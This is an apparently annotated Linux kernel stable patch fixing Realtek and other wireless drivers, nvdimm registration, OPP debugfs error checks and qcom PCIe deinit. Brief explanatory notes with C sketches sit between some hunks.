+ 	val8 = rtl8xxxu_read8(priv, REG_PAD_CTRL1);
+ 	val8 &= ~BIT(0);
+ 	rtl8xxxu_write8(priv, REG_PAD_CTRL1, val8);
++
++	/*
++	 * Fix transmission failure of rtl8192e.
++	 */
++	rtl8xxxu_write8(priv, REG_TXPAUSE, 0x00);
+ }
+ 
+ struct rtl8xxxu_fileops rtl8192eu_fops = {
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index e445084e358f9..95c0150f23569 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -5270,7 +5270,7 @@ static void rtl8xxxu_queue_rx_urb(struct rtl8xxxu_priv *priv,
+ 		pending = priv->rx_urb_pending_count;
+ 	} else {
+ 		skb = (struct sk_buff *)rx_urb->urb.context;
+-		dev_kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		usb_free_urb(&rx_urb->urb);
+ 	}
+ 
+@@ -5547,9 +5547,6 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 	btcoex = &priv->bt_coex;
+ 	rarpt = &priv->ra_report;
+ 
+-	if (priv->rf_paths > 1)
+-		goto out;
+-
+ 	while (!skb_queue_empty(&priv->c2hcmd_queue)) {
+ 		skb = skb_dequeue(&priv->c2hcmd_queue);
+ 
+@@ -5601,10 +5598,9 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 		default:
+ 			break;
+ 		}
+-	}
+ 
+-out:
+-	dev_kfree_skb(skb);
++		dev_kfree_skb(skb);
++	}
+ }
+ 
+ static void rtl8723bu_handle_c2h(struct rtl8xxxu_priv *priv,
+@@ -5970,7 +5966,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ {
+ 	struct rtl8xxxu_priv *priv = hw->priv;
+ 	struct device *dev = &priv->udev->dev;
+-	u16 val16;
+ 	int ret = 0, channel;
+ 	bool ht40;
+ 
+@@ -5980,14 +5975,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ 			 __func__, hw->conf.chandef.chan->hw_value,
+ 			 changed, hw->conf.chandef.width);
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_RETRY_LIMITS) {
+-		val16 = ((hw->conf.long_frame_max_tx_count <<
+-			  RETRY_LIMIT_LONG_SHIFT) & RETRY_LIMIT_LONG_MASK) |
+-			((hw->conf.short_frame_max_tx_count <<
+-			  RETRY_LIMIT_SHORT_SHIFT) & RETRY_LIMIT_SHORT_MASK);
+-		rtl8xxxu_write16(priv, REG_RETRY_LIMIT, val16);
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL) {
+ 		switch (hw->conf.chandef.width) {
+ 		case NL80211_CHAN_WIDTH_20_NOHT:
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+index 58c2ab3d44bef..de61c9c0ddec4 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+@@ -68,8 +68,10 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -79,10 +81,12 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl88ee_disable_bcn_sub_func(struct ieee80211_hw *hw)
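This hunk (repeated below for rtl8723be and rtl8821ae) stops calling kfree_skb() while irq_th_lock is held: the skbs are unlinked onto a stack-local sk_buff_head under the lock and freed only after the unlock. The unlocked __skb_queue_* helpers are fine because free_list is private to the function. Condensed sketch (next_completed_tx_skb() is an illustrative helper):

	struct sk_buff_head free_list;
	unsigned long flags;

	skb_queue_head_init(&free_list);

	spin_lock_irqsave(&lock, flags);
	while ((skb = next_completed_tx_skb()))
		__skb_queue_tail(&free_list, skb);
	spin_unlock_irqrestore(&lock, flags);

	__skb_queue_purge(&free_list);		/* frees all, no lock held */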
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+index 189cc6437600f..0ba3bbed6ed36 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+@@ -30,8 +30,10 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -41,10 +43,12 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8723be_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+index 7e0f62d59fe17..a7e3250957dc9 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+@@ -26,8 +26,10 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -37,10 +39,12 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8821ae_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+index a29321e2fa72f..5323ead30db03 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+@@ -1598,18 +1598,6 @@ static bool _rtl8812ae_get_integer_from_string(const char *str, u8 *pint)
+ 	return true;
+ }
+ 
+-static bool _rtl8812ae_eq_n_byte(const char *str1, const char *str2, u32 num)
+-{
+-	if (num == 0)
+-		return false;
+-	while (num > 0) {
+-		num--;
+-		if (str1[num] != str2[num])
+-			return false;
+-	}
+-	return true;
+-}
+-
+ static s8 _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(struct ieee80211_hw *hw,
+ 					      u8 band, u8 channel)
+ {
+@@ -1659,42 +1647,42 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 	power_limit = power_limit > MAX_POWER_INDEX ?
+ 		      MAX_POWER_INDEX : power_limit;
+ 
+-	if (_rtl8812ae_eq_n_byte(pregulation, "FCC", 3))
++	if (strcmp(pregulation, "FCC") == 0)
+ 		regulation = 0;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "MKK", 3))
++	else if (strcmp(pregulation, "MKK") == 0)
+ 		regulation = 1;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "ETSI", 4))
++	else if (strcmp(pregulation, "ETSI") == 0)
+ 		regulation = 2;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "WW13", 4))
++	else if (strcmp(pregulation, "WW13") == 0)
+ 		regulation = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(prate_section, "CCK", 3))
++	if (strcmp(prate_section, "CCK") == 0)
+ 		rate_section = 0;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "OFDM", 4))
++	else if (strcmp(prate_section, "OFDM") == 0)
+ 		rate_section = 1;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 2;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 3;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 4;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 5;
+ 
+-	if (_rtl8812ae_eq_n_byte(pbandwidth, "20M", 3))
++	if (strcmp(pbandwidth, "20M") == 0)
+ 		bandwidth = 0;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "40M", 3))
++	else if (strcmp(pbandwidth, "40M") == 0)
+ 		bandwidth = 1;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "80M", 3))
++	else if (strcmp(pbandwidth, "80M") == 0)
+ 		bandwidth = 2;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "160M", 4))
++	else if (strcmp(pbandwidth, "160M") == 0)
+ 		bandwidth = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(pband, "2.4G", 4)) {
++	if (strcmp(pband, "2.4G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_2_4G,
+ 							       channel);
+@@ -1718,7 +1706,7 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 			regulation, bandwidth, rate_section, channel_index,
+ 			rtlphy->txpwr_limit_2_4g[regulation][bandwidth]
+ 				[rate_section][channel_index][RF90_PATH_A]);
+-	} else if (_rtl8812ae_eq_n_byte(pband, "5G", 2)) {
++	} else if (strcmp(pband, "5G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_5G,
+ 							       channel);
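Switching to strcmp() also tightens the semantics: _rtl8812ae_eq_n_byte() compared exactly num bytes, which behaves as a prefix match whenever the input is longer than the table string, while strcmp() requires an exact NUL-terminated match. Quick contrast:

	#include <stdio.h>
	#include <string.h>

	int main(void)
	{
		const char *sec = "HT40";	/* hypothetical input */

		/* first-2-bytes compare: acts as a prefix match */
		printf("%d\n", memcmp(sec, "HT", 2) == 0);	/* 1 */

		/* strcmp: exact match only */
		printf("%d\n", strcmp(sec, "HT") == 0);		/* 0 */
		return 0;
	}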
+diff --git a/drivers/net/wireless/realtek/rtw88/coex.c b/drivers/net/wireless/realtek/rtw88/coex.c
+index 6276ad6242991..a82476f47a7c4 100644
+--- a/drivers/net/wireless/realtek/rtw88/coex.c
++++ b/drivers/net/wireless/realtek/rtw88/coex.c
+@@ -4057,7 +4057,7 @@ void rtw_coex_display_coex_info(struct rtw_dev *rtwdev, struct seq_file *m)
+ 		   rtwdev->stats.tx_throughput, rtwdev->stats.rx_throughput);
+ 	seq_printf(m, "%-40s = %u/ %u/ %u\n",
+ 		   "IPS/ Low Power/ PS mode",
+-		   test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags),
++		   !test_bit(RTW_FLAG_POWERON, rtwdev->flags),
+ 		   test_bit(RTW_FLAG_LEISURE_PS_DEEP, rtwdev->flags),
+ 		   rtwdev->lps_conf.mode);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index 52076e89d59a3..2afe64f2abe69 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -273,6 +273,11 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+ 		return -EINVAL;
+ 
++	if (pwr_on)
++		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
++	else
++		clear_bit(RTW_FLAG_POWERON, rtwdev->flags);
++
+ 	return 0;
+ }
+ 
+@@ -335,6 +340,11 @@ int rtw_mac_power_on(struct rtw_dev *rtwdev)
+ 	ret = rtw_mac_power_switch(rtwdev, true);
+ 	if (ret == -EALREADY) {
+ 		rtw_mac_power_switch(rtwdev, false);
++
++		ret = rtw_mac_pre_system_cfg(rtwdev);
++		if (ret)
++			goto err;
++
+ 		ret = rtw_mac_power_switch(rtwdev, true);
+ 		if (ret)
+ 			goto err;
+diff --git a/drivers/net/wireless/realtek/rtw88/main.h b/drivers/net/wireless/realtek/rtw88/main.h
+index bccd7b28f60c7..cd9c068ae1a78 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.h
++++ b/drivers/net/wireless/realtek/rtw88/main.h
+@@ -356,7 +356,7 @@ enum rtw_flags {
+ 	RTW_FLAG_RUNNING,
+ 	RTW_FLAG_FW_RUNNING,
+ 	RTW_FLAG_SCANNING,
+-	RTW_FLAG_INACTIVE_PS,
++	RTW_FLAG_POWERON,
+ 	RTW_FLAG_LEISURE_PS,
+ 	RTW_FLAG_LEISURE_PS_DEEP,
+ 	RTW_FLAG_DIG_DISABLE,
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.c b/drivers/net/wireless/realtek/rtw88/ps.c
+index c93da743681fc..dc0d852182454 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.c
++++ b/drivers/net/wireless/realtek/rtw88/ps.c
+@@ -25,7 +25,7 @@ static int rtw_ips_pwr_up(struct rtw_dev *rtwdev)
+ 
+ int rtw_enter_ips(struct rtw_dev *rtwdev)
+ {
+-	if (test_and_set_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_coex_ips_notify(rtwdev, COEX_IPS_ENTER);
+@@ -50,7 +50,7 @@ int rtw_leave_ips(struct rtw_dev *rtwdev)
+ {
+ 	int ret;
+ 
+-	if (!test_and_clear_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_hci_link_ps(rtwdev, false);
+diff --git a/drivers/net/wireless/realtek/rtw88/wow.c b/drivers/net/wireless/realtek/rtw88/wow.c
+index 89dc595094d5c..16ddee577efec 100644
+--- a/drivers/net/wireless/realtek/rtw88/wow.c
++++ b/drivers/net/wireless/realtek/rtw88/wow.c
+@@ -592,7 +592,7 @@ static int rtw_wow_leave_no_link_ps(struct rtw_dev *rtwdev)
+ 		if (rtw_get_lps_deep_mode(rtwdev) != LPS_DEEP_MODE_NONE)
+ 			rtw_leave_lps_deep(rtwdev);
+ 	} else {
+-		if (test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags)) {
++		if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags)) {
+ 			rtw_wow->ips_enabled = true;
+ 			ret = rtw_leave_ips(rtwdev);
+ 			if (ret)
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index ad420d7ec8af9..a703bb70b8f55 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3047,6 +3047,8 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	INIT_DELAYED_WORK(&rtwdev->cfo_track_work, rtw89_phy_cfo_track_work);
+ 	INIT_DELAYED_WORK(&rtwdev->forbid_ba_work, rtw89_forbid_ba_work);
+ 	rtwdev->txq_wq = alloc_workqueue("rtw89_tx_wq", WQ_UNBOUND | WQ_HIGHPRI, 0);
++	if (!rtwdev->txq_wq)
++		return -ENOMEM;
+ 	spin_lock_init(&rtwdev->ba_lock);
+ 	spin_lock_init(&rtwdev->rpwm_lock);
+ 	mutex_init(&rtwdev->mutex);
+@@ -3070,6 +3072,7 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	ret = rtw89_load_firmware(rtwdev);
+ 	if (ret) {
+ 		rtw89_warn(rtwdev, "no firmware loaded\n");
++		destroy_workqueue(rtwdev->txq_wq);
+ 		return ret;
+ 	}
+ 	rtw89_ser_init(rtwdev);
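The two rtw89 hunks are the two halves of init error handling: check the allocation itself (alloc_workqueue() returns NULL on failure), and have any later failure undo earlier successes with destroy_workqueue(). The general shape, with illustrative type and helper names:

	static int example_init(struct example_dev *dev)
	{
		int ret;

		dev->txq_wq = alloc_workqueue("example_wq", WQ_UNBOUND, 0);
		if (!dev->txq_wq)
			return -ENOMEM;

		ret = example_load_firmware(dev);
		if (ret) {
			destroy_workqueue(dev->txq_wq);	/* unwind */
			return ret;
		}

		return 0;
	}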
+diff --git a/drivers/net/wireless/realtek/rtw89/debug.c b/drivers/net/wireless/realtek/rtw89/debug.c
+index 730e83d54257f..50701c55ed602 100644
+--- a/drivers/net/wireless/realtek/rtw89/debug.c
++++ b/drivers/net/wireless/realtek/rtw89/debug.c
+@@ -594,6 +594,7 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 	struct seq_file *m = (struct seq_file *)filp->private_data;
+ 	struct rtw89_debugfs_priv *debugfs_priv = m->private;
+ 	struct rtw89_dev *rtwdev = debugfs_priv->rtwdev;
++	const struct rtw89_chip_info *chip = rtwdev->chip;
+ 	char buf[32];
+ 	size_t buf_size;
+ 	int sel;
+@@ -613,6 +614,12 @@ rtw89_debug_priv_mac_reg_dump_select(struct file *filp,
+ 		return -EINVAL;
+ 	}
+ 
++	if (sel == RTW89_DBG_SEL_MAC_30 && chip->chip_id != RTL8852C) {
++		rtw89_info(rtwdev, "sel %d is address hole on chip %d\n", sel,
++			   chip->chip_id);
++		return -EINVAL;
++	}
++
+ 	debugfs_priv->cb_data = sel;
+ 	rtw89_info(rtwdev, "select mac page dump %d\n", debugfs_priv->cb_data);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/fw.c b/drivers/net/wireless/realtek/rtw89/fw.c
+index d57e3610fb88e..1d57a8c5e97df 100644
+--- a/drivers/net/wireless/realtek/rtw89/fw.c
++++ b/drivers/net/wireless/realtek/rtw89/fw.c
+@@ -2525,8 +2525,10 @@ static int rtw89_append_probe_req_ie(struct rtw89_dev *rtwdev,
+ 
+ 		list_add_tail(&info->list, &scan_info->pkt_list[band]);
+ 		ret = rtw89_fw_h2c_add_pkt_offload(rtwdev, &info->id, new);
+-		if (ret)
++		if (ret) {
++			kfree_skb(new);
+ 			goto out;
++		}
+ 
+ 		kfree_skb(new);
+ 	}
+diff --git a/drivers/net/wireless/realtek/rtw89/reg.h b/drivers/net/wireless/realtek/rtw89/reg.h
+index ca20bb024b407..0291aff940166 100644
+--- a/drivers/net/wireless/realtek/rtw89/reg.h
++++ b/drivers/net/wireless/realtek/rtw89/reg.h
+@@ -3374,6 +3374,8 @@
+ #define RR_TXRSV_GAPK BIT(19)
+ #define RR_BIAS 0x5e
+ #define RR_BIAS_GAPK BIT(19)
++#define RR_TXAC 0x5f
++#define RR_TXAC_IQG GENMASK(3, 0)
+ #define RR_BIASA 0x60
+ #define RR_BIASA_TXG GENMASK(15, 12)
+ #define RR_BIASA_TXA GENMASK(19, 16)
+diff --git a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+index 006c2cf931116..98428f17814f5 100644
+--- a/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
++++ b/drivers/net/wireless/realtek/rtw89/rtw8852c_rfk.c
+@@ -338,7 +338,7 @@ static void _dack_reload_by_path(struct rtw89_dev *rtwdev,
+ 		(dack->dadck_d[path][index] << 14);
+ 	addr = 0xc210 + offset;
+ 	rtw89_phy_write32(rtwdev, addr, val32);
+-	rtw89_phy_write32_set(rtwdev, addr, BIT(1));
++	rtw89_phy_write32_set(rtwdev, addr, BIT(0));
+ }
+ 
+ static void _dack_reload(struct rtw89_dev *rtwdev, enum rtw89_rf_path path)
+@@ -1873,12 +1873,11 @@ static void _dpk_rf_setting(struct rtw89_dev *rtwdev, u8 gain,
+ 			       0x50101 | BIT(rtwdev->dbcc_en));
+ 		rtw89_write_rf(rtwdev, path, RR_MOD_V1, RR_MOD_MASK, RF_DPK);
+ 
+-		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161) {
++		if (dpk->bp[path][kidx].band == RTW89_BAND_6G && dpk->bp[path][kidx].ch >= 161)
+ 			rtw89_write_rf(rtwdev, path, RR_IQGEN, RR_IQGEN_BIAS, 0x8);
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		} else {
+-			rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
+-		}
++
++		rtw89_write_rf(rtwdev, path, RR_LOGEN, RR_LOGEN_RPT, 0xd);
++		rtw89_write_rf(rtwdev, path, RR_TXAC, RR_TXAC_IQG, 0x8);
+ 
+ 		rtw89_write_rf(rtwdev, path, RR_RXA2, RR_RXA2_ATT, 0x0);
+ 		rtw89_write_rf(rtwdev, path, RR_TXIQK, RR_TXIQK_ATT2, 0x3);
+diff --git a/drivers/net/wireless/rsi/rsi_91x_coex.c b/drivers/net/wireless/rsi/rsi_91x_coex.c
+index 8a3d86897ea8e..45ac9371f2621 100644
+--- a/drivers/net/wireless/rsi/rsi_91x_coex.c
++++ b/drivers/net/wireless/rsi/rsi_91x_coex.c
+@@ -160,6 +160,7 @@ int rsi_coex_attach(struct rsi_common *common)
+ 			       rsi_coex_scheduler_thread,
+ 			       "Coex-Tx-Thread")) {
+ 		rsi_dbg(ERR_ZONE, "%s: Unable to init tx thrd\n", __func__);
++		kfree(coex_cb);
+ 		return -EINVAL;
+ 	}
+ 	return 0;
+diff --git a/drivers/net/wireless/wl3501_cs.c b/drivers/net/wireless/wl3501_cs.c
+index 1b532e00a56fb..7fb2f95134760 100644
+--- a/drivers/net/wireless/wl3501_cs.c
++++ b/drivers/net/wireless/wl3501_cs.c
+@@ -1328,7 +1328,7 @@ static netdev_tx_t wl3501_hard_start_xmit(struct sk_buff *skb,
+ 	} else {
+ 		++dev->stats.tx_packets;
+ 		dev->stats.tx_bytes += skb->len;
+-		kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 
+ 		if (this->tx_buffer_cnt < 2)
+ 			netif_stop_queue(dev);
+diff --git a/drivers/nvdimm/bus.c b/drivers/nvdimm/bus.c
+index b38d0355b0ac3..5ad49056921b5 100644
+--- a/drivers/nvdimm/bus.c
++++ b/drivers/nvdimm/bus.c
+@@ -508,7 +508,7 @@ static void nd_async_device_unregister(void *d, async_cookie_t cookie)
+ 	put_device(dev);
+ }
+ 
+-void nd_device_register(struct device *dev)
++static void __nd_device_register(struct device *dev, bool sync)
+ {
+ 	if (!dev)
+ 		return;
+@@ -531,11 +531,24 @@ void nd_device_register(struct device *dev)
+ 	}
+ 	get_device(dev);
+ 
+-	async_schedule_dev_domain(nd_async_device_register, dev,
+-				  &nd_async_domain);
++	if (sync)
++		nd_async_device_register(dev, 0);
++	else
++		async_schedule_dev_domain(nd_async_device_register, dev,
++					  &nd_async_domain);
++}
++
++void nd_device_register(struct device *dev)
++{
++	__nd_device_register(dev, false);
+ }
+ EXPORT_SYMBOL(nd_device_register);
+ 
++void nd_device_register_sync(struct device *dev)
++{
++	__nd_device_register(dev, true);
++}
++
+ void nd_device_unregister(struct device *dev, enum nd_async_mode mode)
+ {
+ 	bool killed;
+diff --git a/drivers/nvdimm/dimm_devs.c b/drivers/nvdimm/dimm_devs.c
+index c7c9805774911..1634e3c341a90 100644
+--- a/drivers/nvdimm/dimm_devs.c
++++ b/drivers/nvdimm/dimm_devs.c
+@@ -617,7 +617,10 @@ struct nvdimm *__nvdimm_create(struct nvdimm_bus *nvdimm_bus,
+ 	nvdimm->sec.ext_flags = nvdimm_security_flags(nvdimm, NVDIMM_MASTER);
+ 	device_initialize(dev);
+ 	lockdep_set_class(&dev->mutex, &nvdimm_key);
+-	nd_device_register(dev);
++	if (test_bit(NDD_REGISTER_SYNC, &flags))
++		nd_device_register_sync(dev);
++	else
++		nd_device_register(dev);
+ 
+ 	return nvdimm;
+ }
+diff --git a/drivers/nvdimm/nd-core.h b/drivers/nvdimm/nd-core.h
+index cc86ee09d7c08..845408f106556 100644
+--- a/drivers/nvdimm/nd-core.h
++++ b/drivers/nvdimm/nd-core.h
+@@ -107,6 +107,7 @@ int nvdimm_bus_create_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nvdimm_bus_destroy_ndctl(struct nvdimm_bus *nvdimm_bus);
+ void nd_synchronize(void);
+ void nd_device_register(struct device *dev);
++void nd_device_register_sync(struct device *dev);
+ struct nd_label_id;
+ char *nd_label_gen_id(struct nd_label_id *label_id, const uuid_t *uuid,
+ 		      u32 flags);
+diff --git a/drivers/opp/debugfs.c b/drivers/opp/debugfs.c
+index 96a30a032c5f9..2c7fb683441ef 100644
+--- a/drivers/opp/debugfs.c
++++ b/drivers/opp/debugfs.c
+@@ -235,7 +235,7 @@ static void opp_migrate_dentry(struct opp_device *opp_dev,
+ 
+ 	dentry = debugfs_rename(rootdir, opp_dev->dentry, rootdir,
+ 				opp_table->dentry_name);
+-	if (!dentry) {
++	if (IS_ERR(dentry)) {
+ 		dev_err(dev, "%s: Failed to rename link from: %s to %s\n",
+ 			__func__, dev_name(opp_dev->dev), dev_name(dev));
+ 		return;
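The OPP fix is about which failure sentinel an API uses: per this change, debugfs_rename() reports errors as ERR_PTR()-encoded pointers, so a NULL test never fires and the error path is dead code. The matching idiom, sketched:

	dentry = debugfs_rename(rootdir, old_dentry, rootdir, new_name);
	if (IS_ERR(dentry)) {
		pr_err("rename failed: %ld\n", PTR_ERR(dentry));
		return;
	}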
+diff --git a/drivers/pci/controller/dwc/pcie-qcom.c b/drivers/pci/controller/dwc/pcie-qcom.c
+index f711acacaeaf8..f8e512540fb85 100644
+--- a/drivers/pci/controller/dwc/pcie-qcom.c
++++ b/drivers/pci/controller/dwc/pcie-qcom.c
+@@ -1527,8 +1527,19 @@ err_deinit:
+ 	return ret;
+ }
+ 
++static void qcom_pcie_host_deinit(struct dw_pcie_rp *pp)
++{
++	struct dw_pcie *pci = to_dw_pcie_from_pp(pp);
++	struct qcom_pcie *pcie = to_qcom_pcie(pci);
++
++	qcom_ep_reset_assert(pcie);
++	phy_power_off(pcie->phy);
++	pcie->cfg->ops->deinit(pcie);
++}
++
+ static const struct dw_pcie_host_ops qcom_pcie_dw_ops = {
+-	.host_init = qcom_pcie_host_init,
++	.host_init	= qcom_pcie_host_init,
++	.host_deinit	= qcom_pcie_host_deinit,
+ };
+ 
+ /* Qcom IP rev.: 2.1.0	Synopsys IP rev.: 4.01a */
